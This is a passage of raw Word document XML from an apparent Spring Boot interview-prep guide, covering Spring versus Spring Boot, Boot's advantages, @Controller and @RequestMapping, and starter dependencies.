          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D0D69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5. Actuators and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678BDE7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includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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6. Shutdown Hook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CD2FF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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shutdown hook</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6370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Internal Working:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C50AB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rt Application</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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 Request Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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r w:rsidRPr="00CE4B95">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r w:rsidRPr="00CE4B95">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and Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95"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473" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1A754" w14:textId="77777777" w:rsidR="001F0776" w:rsidRPr="00CE4B95" w:rsidRDefault="001F0776" w:rsidP="001F0776">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="487CA658" w14:textId="77777777" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="582" w:name="_Toc197867796"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Spring and Spring Boot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="582"/>
    </w:p>
    <w:p w14:paraId="28DD2FB9" w14:textId="5E324939"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Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38883039"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Steeper due to more setup and configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F14B1A"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474" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAD201"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oot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7349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Zero or minimal configuration — uses auto-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC1438"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Embedded servers like Tomcat/Jetty come pre-configured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6084E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475" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C428590"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E4B95" w14:paraId="3CF92FBD" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F0A9D23"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oot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="2564A916" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EA94B4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ation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1195EEC7" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21B77AF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 Jetty, Undertow)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="205B182F" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF5FF5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fast</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="04400BF4" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BB7F3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ntion over configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1D219C6C" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2817497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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C56293" w:rsidRPr="00CE4B95" w14:paraId="1AC35B55" w14:textId="77777777" w:rsidTr="00C56293">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D7AAE8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REST APIs, POCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5393971B"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476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3510647C" w14:textId="212C14AE" w:rsidR="00844E79" w:rsidRPr="00CE4B95" w:rsidRDefault="00844E79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="583" w:name="_Toc197867797"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the advantages of Spri</w:t>
      </w:r>
      <w:r w:rsidR="00631DB8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="00190868"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oot?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="583"/>
    </w:p>
    <w:p w14:paraId="50EBAF07" w14:textId="1BBBA9D7"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uto Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA43E5"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he need for complex XML or Java config files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C06A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477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB812EE"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mbedded Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAFB45"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es with embedded Tomcat, Jetty, or Undertow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5546527E"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to deploy WAR files — just run the app as a Java application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D7901B"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478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C0179A"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Starter Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195646D7"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line inclusion instead of multiple individual dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7620568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479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A48A4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duction-Ready Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3058BA5A"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monitoring and management via Spring Boot Actuator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1E742"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s endpoints to check health, metrics, environment, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1941C3A5"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480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFB3D4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Minimal Boilerplate Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636B7AD4"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repetitive code and configuration, making development faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53F846"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convention over configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968666E"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481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E4B0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Easy Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C000BF3"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482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84CCE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CLI Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B663C3"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483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C60AA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ect for microservices architecture with lightweight REST services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21F25E"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with built-in defaults and reduced setup time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BD8F0"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484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E5264"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Profiles &amp; Environment Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CBB30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485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A4A16"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Active Community &amp; Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8E79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ed by a strong Spring community.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A3FAA"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l-documented and actively maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A91722"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486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704EFE3" w14:textId="36735C38" w:rsidR="00352F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00352F3B" w:rsidP="00352F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="584" w:name="_Toc197867798"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of @Controller and @RequestMapping?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="584"/>
    </w:p>
    <w:p w14:paraId="6373791B" w14:textId="1F890B17" w:rsidR="00352F3B" w:rsidRPr="00CE4B9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oller — Marks a class as a Spring MVC Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48868B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED5DDF" w14:textId="77777777" w:rsidR="00C4092A"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name (for traditional MVC with JSP/Thymeleaf), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E49A18" w14:textId="1667CB42" w:rsidR="00320315"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ndView object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996C2F2" w14:textId="77777777" w:rsidR="004D6E6A" w:rsidRPr="00CE4B95" w:rsidRDefault="004D6E6A" w:rsidP="00320315">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531C5B84" w14:textId="77777777" w:rsidR="004D6E6A" w:rsidRPr="00CE4B95" w:rsidRDefault="004D6E6A" w:rsidP="00320315">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F85499" w14:textId="77C17116"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32A85F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3161E8D0"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411E"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27CF4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4887A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y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89D5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ew name (hello.jsp or hello.html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAF84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5B2DF9" w14:textId="51C2DDA0"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C11D2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487" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F674D63"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pplied at the class level and/or method level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8B441"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2EE851B"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2375302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path for all methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C43B3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i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2106B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0BBB33"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s GET /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319851F"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14B7D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p>
    <w:p w14:paraId="36DCF105"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7DA26" w14:textId="36826A5D"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A3E19C"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ou can also specify HTTP methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980B04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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7F26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ve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1B4C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d"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4713DB" w14:textId="4737E2F2" w:rsidR="00320315" w:rsidRPr="00CE4B9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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC11FD"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CE4B95" w14:paraId="57304AB1" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114B073B"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320315" w:rsidRPr="00CE4B95" w14:paraId="2981160F" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72AE561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ks class to handle web requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00320315" w:rsidRPr="00CE4B95" w14:paraId="53FB2572" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5837FC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and methods) to handler methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D866D8"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488" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB35371" w14:textId="08A483DF" w:rsidR="00E53476" w:rsidRPr="00CE4B95" w:rsidRDefault="007060F4" w:rsidP="00E53476">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="585" w:name="_Toc197867799"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Spring Boot Starter</w:t>
      </w:r>
      <w:r w:rsidR="00E53476" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
    </w:p>
    <w:p w14:paraId="757DA5BC" w14:textId="4B474CCE" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C2379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pring Boot Starter</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configured set of dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that you can add to your project to get a specific functionality </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>quickly and easily</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C081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manually including multiple libraries, Spring Boot Starters bundle </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>common dependencies together</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, following the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"convention over configuration"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDE6E3C"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489" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0337C998"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rters?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3D7EE0"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in build.gradle or pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683902C2"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brings in compatible versions of libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2BC3D6"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and setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004D025"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490" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B1E86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pring-boot-starter-web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2D331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stead of thi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p>
    <w:p w14:paraId="258A1523"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spring-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59A8C5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33AC6B3A"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com.fasterxml.jackson.core:jackson-databind'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57289DF4" w14:textId="211C235C"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tomcat'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE3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ust use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B5008A" w14:textId="1E7C1D79"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web'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040F7978"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ncludes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3A3F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A73857"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38293F1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21672FC0"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SLF4J + Logback)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9FA807"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491" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFDCEC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E4B95" w14:paraId="71593DF2" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF1EDDA"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81C62" w:rsidRPr="00CE4B95" w14:paraId="78070E81" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07AA54FE"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building web &amp; RESTful apps using Spring MVC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="5CAC9124" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C455C9"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JPA &amp; Hibernate-based database access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w14:paraId="4A902DAF" w14:textId="77777777" w:rsidTr="00C81C62">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
